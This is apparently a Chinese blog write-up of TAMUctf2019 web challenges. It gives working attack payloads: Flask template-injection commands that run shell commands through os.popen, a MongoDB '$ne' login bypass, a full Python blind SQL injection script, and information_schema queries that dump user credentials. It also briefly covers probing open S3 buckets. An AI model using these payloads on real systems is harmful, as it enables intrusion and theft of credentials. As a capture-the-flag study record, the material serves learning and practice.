k0t0r1

TAMUctf2019 web wp
3月初的一个比赛,最近才复现做完 TAMUctf2019
扫描右侧二维码阅读全文
31
2019/03

TAMUctf2019 web wp

3月初的一个比赛,最近才复现做完
TAMUctf2019

Not Another SQLi Challenge

很简单,万能密码过

Robots Rule

打开robots.txt,提示

WHAT IS UP, MY FELLOW HUMAN!
HAVE YOU RECEIVED SECRET INFORMATION ON THE DASTARDLY GOOGLE ROBOTS?!
YOU CAN TELL ME, A FELLOW NOT-A-ROBOT!

于是把user-agent改为googlebot即可

Science!

进入提示Flask框架那应该就是SSTI了
然后尝试{{1+1}}发现上下两个输入框的结果都为2,于是开始搞事

然而正常操作好像不行orz
于是用另一种操作

payload:

{{url_for.__globals__.os.__dict__.popen('ls').read()}}
{{url_for.__globals__.os.__dict__.popen('cat flag.txt').read()}}

这里url_for是flask框架的一个函数,简单来说就是该函数的内核中有os模块,于是再通过__dict__去使用os模块中的popen()函数

Many Gig'ems to you!

打开后有cookies就抓个包,发现

于是猜测gigem_continue是flag的一段,然后F12查看网站的源码看看

于是把这两段连起来提交然而不对
但提示flag in cookies那就打开cookies这个页面的链接
然后F12继续在源码中寻找,发现

于是把source_and_接上得到flag

LoginApp

这题比赛时没搞出来,结束后看wp才知道是一道基础的nosql注入

在复现做的时候迷之burpsuite抓不到包,于是只能手动弄http报文
F12可以看到用了ajax,将输入的username和password打包成json,以post方式发向login

$("#submit").on('click', function(){
    $.ajax({
        url: 'login', 
        type : "POST", 
        dataType : 'json', 
        data : JSON.stringify({"username": $("#username").val(), "password": $("#password").val()}),
        contentType: 'application/json;charset=UTF-8',
        success : function(result) {
            $(".result").html(result);
            console.log(result);
            alert(result);
        },
        error: function(xhr, resp, text) {
            $(".result").html("Something went wrong"); 
            console.log(xhr, resp, text);
        }
    })
});

于是就写一段js生成要post的json字符串

<script type="text/javascript">
    alert(JSON.stringify({"username": "admin", "password": {"$ne":1}}));
</script>

修改一下content-type,发包得到flag

payload:
{"username":"admin","password":{"$ne":"1"}}

BirdBox

这题比赛时就觉得是一道盲注,比较正确和错误时是很明显的两个页面

然后就上python脚本
然而只能跑出注释里给出的值,而且列,表和库都只有一个
看了wp才知道是放在user里,以后还是要仔细点做orz

# -*- coding:utf8 -*-  
import requests
import time
import re

url = r'http://localhost/Website/Search.php?Search='

for i in range(1):

    l1 = 0
    r1 = 100

    while(l1<=r1):
        mid1 = (l1 + r1)/2    
        payload = "1'^((select length(user()))="+str(mid1)+")^'"
        new_url = url + payload
        print new_url
        try:
            http = requests.get(new_url,timeout=5)
        except requests.exceptions.Timeout:
            for p in range(1, 10):
                print "p"+str(p)
                try:
                    http = requests.get(new_url,timeout=5)
                    time.sleep(5)
                except requests.exceptions.Timeout:
                            pass
                if http.content:
                            break
        time.sleep(1)
        if re.findall(r"<h1>(.*)</h1>",http.content)[0] == 'Nice try, nothing to see here.' :
            break
        else:
            payload = "1'^((select length(user()))<"+str(mid1)+")^'"
            new_url = url + payload
            print new_url
            try:
                http = requests.get(new_url,timeout=5)
            except requests.exceptions.Timeout:
                for p in range(1, 10):
                    print "p"+str(p)
                    try:
                        http = requests.get(new_url,timeout=5)
                        time.sleep(5)
                    except requests.exceptions.Timeout:
                                pass
                    if http.content:
                                break
            time.sleep(1)
            if re.findall(r"<h1>(.*)</h1>",http.content)[0] == 'Nice try, nothing to see here.' :
                r1 = mid1 - 1
            else:
                l1 = mid1 + 1

    if mid1==0:
        break
    print 
    print str(i)+":"+str(mid1)
    k = ''



    for j in range(mid1):

        l2 = 0
        r2 = 128

        while(l2<=r2):
            mid2 = (l2 + r2)/2    
            payload = "1'^((select ascii(mid(user(),"+str(j+1)+",1)))="+str(mid2)+")^'"
            new_url = url + payload
            print new_url
            try:
                http = requests.get(new_url,timeout=5)
            except requests.exceptions.Timeout:
                for p in range(1, 10):
                    print "p"+str(p)
                    try:
                        http = requests.get(new_url,timeout=5)
                        time.sleep(5)
                    except requests.exceptions.Timeout:
                                pass
                    if http.content:
                                break
            time.sleep(1)
            if re.findall(r"<h1>(.*)</h1>",http.content)[0] == 'Nice try, nothing to see here.' :
                q = mid2
                break
            else:
                payload = "1'^((select ascii(mid(user(),"+str(j+1)+",1)))<"+str(mid2)+")^'"
                new_url = url + payload
                print new_url
                try:
                    http = requests.get(new_url,timeout=5)
                except requests.exceptions.Timeout:
                    for p in range(1, 10):
                        print "p"+str(p)
                        try:
                            http = requests.get(new_url,timeout=5)
                            time.sleep(5)
                        except requests.exceptions.Timeout:
                                    pass
                        if http.content:
                                    break
                time.sleep(1)
                if re.findall(r"<h1>(.*)</h1>",http.content)[0] == 'Nice try, nothing to see here.' :
                    r2 = mid2 - 1
                else:
                    l2 = mid2 + 1

        print 
        k = k+chr(q)
        print k

    print

payload:
1'^((select length(user()))=50)^'
1'^((select ascii(mid(user(),1,1)))=64)^'

l33tSecurity

和上题一样也是一道盲注题,比较坑的地方是跳转到message页面的那个按钮太小了,看了好久才找到这个页面orz

message页面一看url就觉得有注入点,也是很明显的盲注,同样上脚本

1' and ((select length(group_concat(table_name)) from information_schema.tables where table_schema=database())=50) and '1
1' and ((select ascii(mid((group_concat(table_name)),1,1)) from information_schema.tables where table_schema=database())=64) and '1

跑出messages,users
然后接着查users表

1' and ((select length(group_concat(column_name)) from information_schema.columns where table_name='users')=50) and '1
1' and ((select ascii(mid((group_concat(column_name)),1,1)) from information_schema.columns where table_name='users')=64) and '1

跑出UserID,Username,Password,FirstName,LastName,Phone,Email,Description,CreateDate,Secret
感觉UserID,Username,Password和Secret会有用,于是继续注入

1' and ((select length(group_concat(UserID,' ',Username,' ',Password,' ',Secret)) from users)=250) and '1
1' and ((select ascii(mid((group_concat(UserID,' ',Username,' ',Password,' ',Secret)),1,1)) from users)=64) and '1

拿到了所有用户的信息,最重要的还是admin的

1 1337-admin 02ca0b0603222a090fe2fbf3ba97d90c WIFHXDZ3BOHJMJSC

密码应该是md5加密过用不了,于是试着抓包看看,发现cookie里有id和secret

于是修改一下cookie再发送得到flag

Buckets

这题要注册一个亚马逊服务器,有点麻烦就没复现

这题参考这里
针对亚马逊云存储器S3 BUCKET的渗透测试

不是看得很懂,大概是在AmazonS3上,我们可以尝试用http://bucketname.s3.amazonaws.com这样的方式去探查不受访问权限限制的bucket,如果成功就会返回一个目录列表,然后就能各种搞事了

最后修改:2019 年 04 月 06 日 03 : 02 PM
如果觉得我的文章对你有用,请随意赞赏

发表评论